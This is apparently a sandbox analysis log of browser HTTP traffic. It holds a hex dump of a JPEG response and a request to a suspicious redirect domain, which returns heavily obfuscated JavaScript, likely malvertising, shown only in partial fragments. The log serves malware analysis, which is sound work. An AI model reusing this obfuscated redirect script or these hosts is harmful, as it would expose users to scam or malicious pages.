                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:17 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 25107
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 53dd02c4-caf2-4ca7-81c8-9371ec9368da
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sat, 15 Mar 2008 05:31:45 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 13 Nov 2044 17:39:10 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 439510
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:17 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200127-IAD, cache-nyc-kteb1890097-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 07 00 04 05 06 01 02 03 08 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 9f 67 15 5c ac 8b cf f3 4a 55 17 30 80 e3
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3g\JU0
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: f2 d6 62 d5 67 1d cf e7 bc 0e 8b 6d 72 77 2f 5d 7e d5 9c a4 12 b9 72 f4 98 38 d5 17 1f 40 ff 00 bc 35 c7 b7 9e f7 0f 04 b9 77 c0 40 82 3e ed e2 4b 1a f4 e1 6d f4 0f 94 f6 e7 e8 f4 00 72 0f a5 cb d7 dc 26 f7 9e 32 ae b1 3a 6e f7 8b 8c ed cc 94 3b f9 65 dd c7 71 9b 95 a6 59 e7 f5 81 35 43 ac 16 fc ce d9 61 30 eb 7d 76 5c 2c f2 1d 6d a6 cb d6 72 13 ac d9 11 e0 ed ae 3b 5d b9 52 e6 13 bc 35 ac 75 ac 76 8d db 5d 71 58 ca 4c a5 b0 e2 d7 5e 7c dc b2 64 fa 6d e4 bb 59 09 d3 8f 0c 4a ca ef bf 58 1c eb 7b 2d 76 50 de 6a b9 33 60 39 9f 46 7d 3c 98 e6 e3 09 cb ae 9a af 4e 7d ba 9c 7b b3 ee af e3 1e c7 0f a5 5e 58 33 d9 b5 fa 16 cd cb ad 7c 4a 53 11 6f 11 89 2e 9e 55 9d 7b 98 79 97 ad 77 9a 63 97 4b 47 0e 6c b3 b9 0d da 5a 17 a6 fb 73 e7 d3 8f 3e ea c8 e9 c8 97 89 dd
                                                                                                                                                                                          Data Ascii: bgmrw/]~r8@5w@>Kmr&2:n;eqY5Ca0}v\,mr;]R5uv]qXL^|dmYJX{-vPj3`9F}<N}{^X3|JSo.U{ywcKGlZs>
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 5b 40 ae 9a 0a 5b 6f a2 b1 02 2e 45 bf 33 03 91 7b f5 1a 9f 57 69 bb a1 3d 50 57 2a fd 3b 35 00 94 6b 6e e9 2d 38 b7 6d 77 50 0e 4d 46 d3 56 46 a4 23 67 a8 ab 4b 14 5f ea 5c 06 e1 b8 f5 d8 b9 26 16 7c 76 ad d9 ae c9 4d 43 5d d5 b8 bd d2 cc 97 6d 4a 62 de 72 05 a0 e3 62 a8 b1 6a b6 ea 3a c0 3a b6 39 ab 21 96 af 56 4f c9 11 dd 76 33 63 d4 a2 bc 77 e4 22 fd 2b 2f bd 69 b1 4b 62 fe 95 5a 5b 6d 8b 94 51 6e a6 f0 31 5a b8 97 07 a3 1a a9 68 09 59 db c4 32 37 f4 91 85 a3 a7 7d 73 a8 35 15 cb 7e 87 9a 17 5c 34 99 f8 68 29 da 30 dd 2a 6c 85 35 5a 45 36 d6 fc 46 ae 9f 4f a5 90 83 27 a4 55 ec a6 c7 ea 32 dc 06 48 c8 7e 1b 95 5d 0d 7e fe 15 77 47 eb c8 b1 3a 8f d2 37 6a bd f5 9c 23 2e aa aa b9 1e ed b5 f4 cc cd ce a6 db 58 ca b2 43 55 92 ac fa 56 a2 a7 c2 76 b3 aa 5a
                                                                                                                                                                                          Data Ascii: [@[o.E3{Wi=PW*;5kn-8mwPMFVF#gK_\&|vMC]mJbrbj::9!VOv3cw"+/iKbZ[mQn1ZhY27}s5~\4h)0*l5ZE6FO'U2H~]~wG:7j#.XCUVvZ
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: ef 2c 40 b3 84 3f 95 3c 4f 1f 61 d4 2f 99 89 88 5f bc a7 07 61 13 d3 aa 6b 33 ae df fa 41 2b da 9a 4a fe 55 13 8b 5f e1 3d ea 26 91 90 f6 96 f9 6f 78 82 09 e2 6f 95 dc ab d8 f5 ff 00 22 f6 d3 bc c6 ba 7f 96 b2 c3 b3 eb ba c0 fe 28 bb a6 db 86 6d c2 ea 43 89 87 73 27 85 cd f9 7b 9b da de d2 ba b9 66 66 ae 3f 69 6d 86 c6 d4 ad 45 a2 d1 fe db 1c 44 c7 1d e3 d1 bc 76 34 b2 7d 50 ce a7 88 c7 b9 8d e4 f2 c6 a7 ac db 45 89 b1 8a f3 1c 80 e4 b5 8f c9 a9 2c d3 5d 9d b6 cb 8e b3 1e 58 a2 30 56 ec d9 4a 01 1b 65 37 69 f2 96 4d 3c 63 ae a6 2d 72 ba c0 e5 c4 33 ba 03 68 3b ad 3a 95 a4 20 d5 9e f0 3b 2f 55 8f 81 5f 82 4a 85 2b 3c f6 83 58 f4 2b 78 b5 0d 47 69 27 c4 71 dc c3 cb 1e d3 53 6a 2d ee cc 60 1a a7 21 c8 45 1a ca d2 0e d3 a7 bf cd df ea 27 69 bb 55 8b de 66 d5
                                                                                                                                                                                          Data Ascii: ,@?<Oa/_ak3A+JU_=&oxo"(mCs'{ff?imEDv4}PE,]X0VJe7iM<c-r3h;: ;/U_J+<X+xGi'qSj-`!E'iUf
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: dd 3f 10 7f 70 9f ea 34 63 fe 49 a0 cd 5d cb 9f f3 74 a6 dd 44 d9 d5 4c 44 19 b6 f5 6c 66 9a 6a 63 9f 48 bb 11 ec 66 d2 2e 4d a9 ae dc ec a6 b2 ba c0 18 e7 ea 6d 92 cf a9 a0 9c 60 1f 50 d0 6b 32 31 0d 49 55 aa 1b 53 df 1e a3 90 c1 17 2e 81 4d b6 20 7a fb 46 1f ba 88 fa 4e 18 75 c8 a6 12 59 db 5e e2 50 4f a6 6e ab 31 6e fc be e3 1c 22 7e 75 83 50 dd f8 8b fe bb 88 c7 58 0f eb 89 e0 2c a1 45 ce 95 1c 8a 1a 86 2b 35 65 20 8c 9c b6 c9 2a cc a4 a9 33 17 ce 1c 7f 33 10 eb 62 4c c3 a5 b6 6b 91 99 6d 5d 25 5f 88 df 2e c8 7b 31 91 d8 b1 f1 09 59 67 d4 d0 4e 27 c4 ae a2 e2 89 f1 8c 89 77 17 b2 86 a3 75 d9 39 35 d9 5e cc a4 14 57 a6 3f 16 b3 4c ab c4 ea c2 7f 73 11 46 ab 06 7d a3 38 55 3e 2f 7e e2 26 26 65 d6 ee b2 cb 78 d5 ce 4e 99 3b f2 c6 24 e2 39 f6 d3 7b a2 af
                                                                                                                                                                                          Data Ascii: ?p4cI]tDLDlfjcHf.Mm`Pk21IUS.M zFNuY^POn1n"~uPX,E+5e *33bLkm]%_.{1YgN'wu95^W?LsF}8U>/~&&exN;$9{
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 20 21 31 13 04 30 22 41 42 60 71 ff da 00 08 01 02 01 01 08 00 a7 63 43 c7 39 3b 14 32 2f 13 95 76 93 29 94 cd d2 7d 0a cb fe db 6c b6 5b 2d 9b 8d c6 e1 d1 63 c9 4a c5 9e d1 8d 74 c8 cd f8 f4 6d 9b a6 6e 67 a6 d3 70 97 f2 b3 73 37 09 a1 c9 21 48 b6 fc 72 ea 84 ba 17 4c fa 1f 54 7d 10 d6 e3 71 b8 dc 59 7a 6f a1 fe 42 5e ad ac f9 a1 2a 12 1c 44 8a 28 6f b1 63 77 7a 57 37 89 31 46 a4 55 89 69 5a 39 51 6d 8f 1d f0 72 a2 59 98 bf 2d 11 9a 97 9a b1 59 b5 af 4d e6 e4 7a 57 19 ba 43 90 fb 31 65 70 90 9d ae 09 77 c2 84 b9 4e 36 89 46 98 8d a9 18 33 6e 54 f5 b2 ef 93 63 91 b8 52 b3 24 5f a9 27 37 4e 70 71 91 f2 b5 71 84 d4 19 19 ee 56 bf 43 1b a1 e4 3e 84 66 4f 33 8f 90 6d f6 65 5d 8a 6d 12 74 60 4f e6 b8 5f 27 11 c1 8d 91 66 55 d5 90 93 51 46 55 6e c5 17 74 4a 2d
                                                                                                                                                                                          Data Ascii: !10"AB`qcC9;2/v)}l[-cJtmngps7!HrLT}qYzoB^*D(ocwzW71FUiZ9QmrY-YMzWC1epwN6F3nTcR$_'7NpqqVC>fO3me]mt`O_'fUQFUntJ-
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: c1 13 40 42 53 92 d1 e1 23 f0 f1 50 72 82 04 33 54 62 a2 c2 ff da 00 08 01 01 00 09 3f 02 19 28 28 28 20 85 61 00 82 82 08 20 85 77 89 a8 10 9a bb c2 c4 2c 33 0a 0a 11 41 42 27 24 10 50 50 50 a8 28 20 a0 a4 84 7a 0e f4 43 a0 c2 e0 d6 f6 cc 7f 60 28 6d d2 44 92 6e 6b 61 f6 4e 6b da 4c 22 db a1 e6 b6 60 f8 f0 d9 f1 45 b8 91 b7 03 03 0e f5 01 ec a3 b4 48 b8 ca 1c d6 c7 42 11 06 3e 7c 16 cb 9b 49 81 6e 4a 45 51 02 48 bf a3 b5 97 ac d0 df 6e e6 4d 39 72 4e a3 78 6e 2d 6e 3a a0 d2 1a 45 c7 13 9e 2b 61 ce 23 11 83 79 cd 38 3b 1c 01 6c 20 9c c6 17 60 c3 79 5d 07 88 ed 46 ff 00 dc 53 db 16 e3 46 9c 18 c1 99 11 50 b8 ef 0c d1 81 a9 9b 7b 27 a3 1e 4a 8d ac 76 42 06 f8 dd e0 bd 98 00 6f 5f e5 15 06 ec fb 38 b3 18 f7 ad 96 b5 b8 bd de 81 10 76 6e 8b 70 31 54 4c dd c4
                                                                                                                                                                                          Data Ascii: @BS#Pr3Tb?((( a w,3AB'$PPP( zC`(mDnkaNkL"`EHB>|InJEQHnM9rNxn-n:E+a#y8;l `y]FSFP{'JvBo_8vnp1TL
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 05 78 70 11 e1 56 79 c9 7c 35 7c 8f 4a a7 5e e7 c1 38 f0 e0 8d 57 16 62 de d7 10 bc 90 cc 55 8c 17 c9 f4 ab e3 2b b8 e4 54 6e 43 24 17 66 92 ae d0 58 c4 a7 40 7b 36 a7 94 62 7d a5 73 35 1b a0 dc b8 27 0d 15 ed 75 18 88 5f aa ca 4d db b1 e0 56 05 e3 da 4d bc 39 2e d5 5f 23 d1 4c 23 d1 8c b8 23 3c 93 a1 46 cc 4c 31 e0 17 44 64 20 84 5e e0 70 e6 8c 00 86 48 f8 23 77 c4 d8 5e cf c2 77 82 ed 1a be 47 a2 e0 bb 4b 72 8d d1 89 f8 4c 51 e5 75 c5 3b c1 1f 04 71 c6 e5 7c 06 d5 19 98 cd 14 43 69 73 8e 0f ef 9a a1 10 0d de c7 0a be 69 ae 66 a9 33 ca af 94 16 7e 1c 96 78 8c 8a bc 47 a4 33 69 ab fe 3f a2 98 5d af 45 73 5a 4e d3 a4 84 28 d9 80 f5 57 92 b7 8e 2e 95 f8 04 3f 55 80 7f 98 fc 55 78 38 89 ab e8 dc 6e 32 e0 57 6c d5 ff 00 1f d2 ae d2 c5 c4 b9 de 8b 73 27 66 cf
                                                                                                                                                                                          Data Ascii: xpVy|5|J^8WbU+TnC$fX@{6b}s5'u_MVM9._#L##<FL1Dd ^pH#w^wGKrLQu;q|Cisif3~xG3i?]EsZN(W.?UUx8n2Wls'f
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 74 d2 06 43 67 ac f7 43 35 f7 9f 01 1c fa 20 60 ac cb 48 54 cc 79 16 9e a0 11 63 63 28 13 a6 8d 69 d9 fc a1 d7 4d de 92 08 03 77 a9 73 d1 f8 2a 6b a5 99 db 44 ea b0 f9 80 21 81 fd d4 7a fd 47 bb 29 c3 5d ea 80 cb 95 3a 74 98 b7 89 e1 f6 85 8d c3 ba 53 cb 53 23 4a 86 ba 92 be 1c 63 00 41 f5 81 bf 61 03 40 b0 34 17 a3 02 f6 85 15 8d 80 a0 05 5b e3 68 45 32 16 23 46 c0 e5 99 9c 24 c4 cb 8e f7 cc ac a1 84 64 17 b0 61 8b c1 3a c8 fa 82 4b 0e c9 8e 34 b8 76 1f 8f 9e d3 34 24 bd a3 46 af 85 1e e8 e3 fb 95 b2 08 2f 68 19 02 b2 d0 db 30 f7 52 38 04 8f 49 1b 8f 8e c7 8f 51 0d 90 95 29 a5 f2 7b c7 ee 13 6c 6d 36 98 19 4c 70 5a da ce 21 63 d9 99 a5 be e2 22 6b c0 40 a3 a8 1f 71 3b 92 51 a2 bf dd cb c6 d9 8a af ee 18 cf de 7b 5a 31 1c 1b a7 78 18 70 4d f3 64 e7 20 6c
                                                                                                                                                                                          Data Ascii: tCgC5 `HTycc(iMws*kD!zG)]:tSS#JcAa@4[hE2#F$da:K4v4$F/h0R8IQ){lm6LpZ!c"k@q;Q{Z1xpMd l
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1378INData Raw: 09 5b da 32 b5 88 1d 9f b3 3c a6 f2 bd 05 c1 d3 1f 81 42 3a 4f 74 c7 a4 54 3a dd 21 73 18 88 02 3c 18 67 3a 4a 08 22 d6 6a 40 db f9 19 8d 76 e9 38 7d 6a 18 3a 1e a5 c0 dc 14 6a 30 4c 3b 7f 66 53 9c a1 ae 9a 74 3d 1c 08 0a 37 5b 74 30 e9 83 8d c2 09 0f a6 d8 d8 c5 a1 b6 70 41 51 ad 10 a4 59 8a b3 1d 41 8b d0 6b fd 97 9d a1 af ed b0 fc c2 03 e8 84 11 cd 7e cc 57 79 d3 1d 36 fc 01 c2 d6 1c 05 fa ca 2a 28 08 71 b2 98 b6 84 10 48 cc d9 82 09 10 8e cb 36 22 66 c2 77 88 a2 63 ee 0c 72 76 98 61 61 da c1 12 46 d1 20 c2 f9 86 2f c4 44 a0 85 5d 3f 66 63 c3 1d 0f e0 5d 2d 11 e8 21 19 80 83 e4 84 56 04 12 50 8c 99 54 37 98 82 2a 07 95 88 0d cb 48 04 a1 81 f6 88 99 73 28 08 6d c1 10 8e 3c bd 50 0b 6d 05 0d a0 90 73 ac 26 62 1b 86 28 25 98 87 44 28 2e df b3 18 f7 9f 71
                                                                                                                                                                                          Data Ascii: [2<B:OtT:!s<g:J"j@v8}j:j0L;fSt=7[t0pAQYAk~Wy6*(qH6"fwcrvaaF /D]?fc]-!VPT7*Hs(m<Pms&b(%D(.q


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          139192.168.2.164987954.225.185.1104436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:17 UTC920OUTGET /UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=US HTTP/1.1
                                                                                                                                                                                          Host: lgzmq.employmehnt.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:17 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Content-Length: 12902
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-Powered-By: Express
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                          Access-Control-Allow-Headers: X-Requested-With,content-type
                                                                                                                                                                                          ETag: W/"3266-c1NTep+QlgSrmS9Y0DkFv7oefo4"
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          2024-12-15 11:38:17 UTC699INData Raw: 3c 68 65 61 64 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 72 65 70 6c 61 63 65 4f 75 74 62 72 61 69 6e 50 6f 6c 69 63 79 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 42 39 37 37 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3d 3d 3d 74 79 70 65 6f 66 7b 7d 3f 77 69 6e 64 6f 77 3a 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3d 3d 3d 74 79 70 65 6f 66 7b 7d 3f 67 6c 6f 62 61 6c 3a 74 68 69 73 29 3b 66 75 6e 63 74 69 6f 6e 20 42 39 37 37 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6d 33 28 29 7b 76 61 72 20 4a 39 3d 32 3b 66 6f 72 28 3b 4a 39 21 3d 3d 35 3b 29 7b 73 77 69 74 63 68 28 4a 39 29 7b 63 61 73 65 20 32 3a 76 61 72 20 74 39 3d 5b 61 72 67 75 6d 65 6e 74 73 5d 3b 72 65 74 75 72 6e 20 74 39 5b 30 5d 5b 30 5d 2e 41 72 72 61 79 3b 62 72 65 61 6b 3b 7d 7d
                                                                                                                                                                                          Data Ascii: <head></head><body>...replaceOutbrainPolicy--><script>B977(typeof window===typeof{}?window:typeof global===typeof{}?global:this);function B977(){function m3(){var J9=2;for(;J9!==5;){switch(J9){case 2:var t9=[arguments];return t9[0][0].Array;break;}}
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 5b 33 38 5d 2b 3d 61 39 5b 36 31 5d 3b 61 39 5b 33 38 5d 2b 3d 61 39 5b 38 5d 3b 61 39 5b 32 39 5d 3d 61 39 5b 32 30 5d 3b 47 39 3d 35 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 31 3a 61 39 5b 31 36 5d 3d 22 39 37 22 3b 61 39 5b 35 37 5d 3d 22 7a 22 3b 61 39 5b 39 37 5d 3d 34 3b 61 39 5b 39 37 5d 3d 31 3b 47 39 3d 34 34 3b 62 72 65 61 6b 3b 63 61 73 65 20 36 31 3a 61 39 5b 34 35 5d 2b 3d 61 39 5b 31 36 5d 3b 61 39 5b 34 35 5d 2b 3d 61 39 5b 35 31 5d 3b 61 39 5b 32 35 5d 3d 61 39 5b 32 33 5d 3b 47 39 3d 35 38 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 35 3a 61 39 5b 36 34 5d 2b 3d 61 39 5b 35 31 5d 3b 61 39 5b 36 34 5d 2b 3d 61 39 5b 35 31 5d 3b 61 39 5b 31 34 5d 3d 61 39 5b 36 5d 3b 47 39 3d 37 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 38 3a 61 39 5b 32 35 5d
                                                                                                                                                                                          Data Ascii: [38]+=a9[61];a9[38]+=a9[8];a9[29]=a9[20];G9=52;break;case 31:a9[16]="97";a9[57]="z";a9[97]=4;a9[97]=1;G9=44;break;case 61:a9[45]+=a9[16];a9[45]+=a9[51];a9[25]=a9[23];G9=58;break;case 55:a9[64]+=a9[51];a9[64]+=a9[51];a9[14]=a9[6];G9=75;break;case 58:a9[25]
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 5d 2b 3d 61 39 5b 35 31 5d 3b 61 39 5b 35 35 5d 3d 61 39 5b 35 5d 3b 47 39 3d 34 36 3b 62 72 65 61 6b 3b 63 61 73 65 20 37 30 3a 76 61 72 20 52 33 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 48 39 3d 32 3b 66 6f 72 28 3b 48 39 21 3d 3d 35 3b 29 7b 73 77 69 74 63 68 28 48 39 29 7b 63 61 73 65 20 32 3a 76 61 72 20 55 39 3d 5b 61 72 67 75 6d 65 6e 74 73 5d 3b 53 33 28 61 39 5b 30 5d 5b 30 5d 2c 55 39 5b 30 5d 5b 30 5d 2c 55 39 5b 30 5d 5b 31 5d 2c 55 39 5b 30 5d 5b 32 5d 2c 55 39 5b 30 5d 5b 33 5d 29 3b 48 39 3d 35 3b 62 72 65 61 6b 3b 7d 7d 7d 3b 47 39 3d 36 39 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 33 3a 61 39 5b 34 5d 3d 22 22 3b 61 39 5b 36 31 5d 3d 22 5f 72 65 73 69 64 22 3b 61 39 5b 36 32 5d 3d 22 39 22 3b 61 39 5b 34 5d 3d 22 65 22 3b 61 39 5b 35
                                                                                                                                                                                          Data Ascii: ]+=a9[51];a9[55]=a9[5];G9=46;break;case 70:var R3=function(){var H9=2;for(;H9!==5;){switch(H9){case 2:var U9=[arguments];S3(a9[0][0],U9[0][0],U9[0][1],U9[0][2],U9[0][3]);H9=5;break;}}};G9=69;break;case 23:a9[4]="";a9[61]="_resid";a9[62]="9";a9[4]="e";a9[5
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 6e 74 73 5d 3b 72 65 74 75 72 6e 20 42 39 5b 30 5d 5b 30 5d 2e 52 65 67 45 78 70 3b 62 72 65 61 6b 3b 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 33 28 29 7b 76 61 72 20 52 35 3d 32 3b 66 6f 72 28 3b 52 35 21 3d 3d 35 3b 29 7b 73 77 69 74 63 68 28 52 35 29 7b 63 61 73 65 20 32 3a 76 61 72 20 73 39 3d 5b 61 72 67 75 6d 65 6e 74 73 5d 3b 72 65 74 75 72 6e 20 73 39 5b 30 5d 5b 30 5d 2e 46 75 6e 63 74 69 6f 6e 3b 62 72 65 61 6b 3b 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 37 6d 6d 28 29 7b 7d 41 37 6d 6d 2e 6f 35 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 53 35 3d 32 3b 66 6f 72 28 3b 53 35 21 3d 3d 33 3b 29 7b 73 77 69 74 63 68 28 53 35 29 7b 63 61 73 65 20 32 3a 76 61 72 20 65 35 3d 5b 61 72 67 75 6d 65 6e 74 73 5d 3b 65 35 5b 39 5d 3d 7b 7d 3b 65 35 5b 39
                                                                                                                                                                                          Data Ascii: nts];return B9[0][0].RegExp;break;}}}function x3(){var R5=2;for(;R5!==5;){switch(R5){case 2:var s9=[arguments];return s9[0][0].Function;break;}}}}function A7mm(){}A7mm.o5=function(){var S5=2;for(;S5!==3;){switch(S5){case 2:var e5=[arguments];e5[9]={};e5[9
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 5b 5a 35 5b 35 31 5d 5d 3d 5a 35 5b 39 30 5d 3b 5a 35 5b 34 32 5d 2e 41 39 37 37 28 5a 35 5b 35 39 5d 29 3b 6d 35 3d 31 34 39 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 32 34 3a 5a 35 5b 37 38 5d 3d 5a 35 5b 31 34 5d 5b 5a 35 5b 32 30 5d 5d 3b 74 72 79 7b 5a 35 5b 39 30 5d 3d 5a 35 5b 37 38 5d 5b 5a 35 5b 37 32 5d 5d 28 29 3f 5a 35 5b 31 39 5d 3a 5a 35 5b 34 31 5d 3b 7d 63 61 74 63 68 28 71 32 29 7b 5a 35 5b 39 30 5d 3d 5a 35 5b 34 31 5d 3b 7d 6d 35 3d 31 32 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 31 3a 5a 35 5b 38 5d 3d 7b 7d 3b 5a 35 5b 38 5d 2e 43 3d 5b 27 76 37 27 5d 3b 5a 35 5b 38 5d 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 42 31 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 22 2e 30 31 22 29 3b
                                                                                                                                                                                          Data Ascii: [Z5[51]]=Z5[90];Z5[42].A977(Z5[59]);m5=149;break;case 124:Z5[78]=Z5[14][Z5[20]];try{Z5[90]=Z5[78][Z5[72]]()?Z5[19]:Z5[41];}catch(q2){Z5[90]=Z5[41];}m5=122;break;case 21:Z5[8]={};Z5[8].C=['v7'];Z5[8].S=function(){var B1=function(){return parseFloat(".01");
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 31 3d 21 2f 5c 78 36 31 2f 2e 6f 39 37 37 28 74 31 2b 5b 5d 29 3b 72 65 74 75 72 6e 20 49 31 3b 7d 3b 5a 35 5b 37 37 5d 3d 5a 35 5b 37 5d 3b 5a 35 5b 31 5d 3d 7b 7d 3b 6d 35 3d 31 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 33 34 3a 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 39 38 5d 29 3b 5a 35 5b 34 32 5d 3d 5b 5d 3b 6d 35 3d 31 33 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 34 3a 5a 35 5b 35 32 5d 3d 5a 35 5b 33 5d 3b 5a 35 5b 39 5d 3d 7b 7d 3b 5a 35 5b 39 5d 2e 43 3d 5b 27 79 37 27 5d 3b 5a 35 5b 39 5d 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 48 31 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 71 31 3b 73 77 69 74 63 68 28 71 31 29 7b 63 61 73 65 20 30 3a 62 72 65 61 6b 3b 7d 7d 3b 76 61 72 20 5a 31 3d 21 2f 5c 78 33 30 2f 2e 6f 39 37 37
                                                                                                                                                                                          Data Ascii: 1=!/\x61/.o977(t1+[]);return I1;};Z5[77]=Z5[7];Z5[1]={};m5=15;break;case 134:Z5[14].A977(Z5[98]);Z5[42]=[];m5=132;break;case 14:Z5[52]=Z5[3];Z5[9]={};Z5[9].C=['y7'];Z5[9].S=function(){var H1=function(){var q1;switch(q1){case 0:break;}};var Z1=!/\x30/.o977
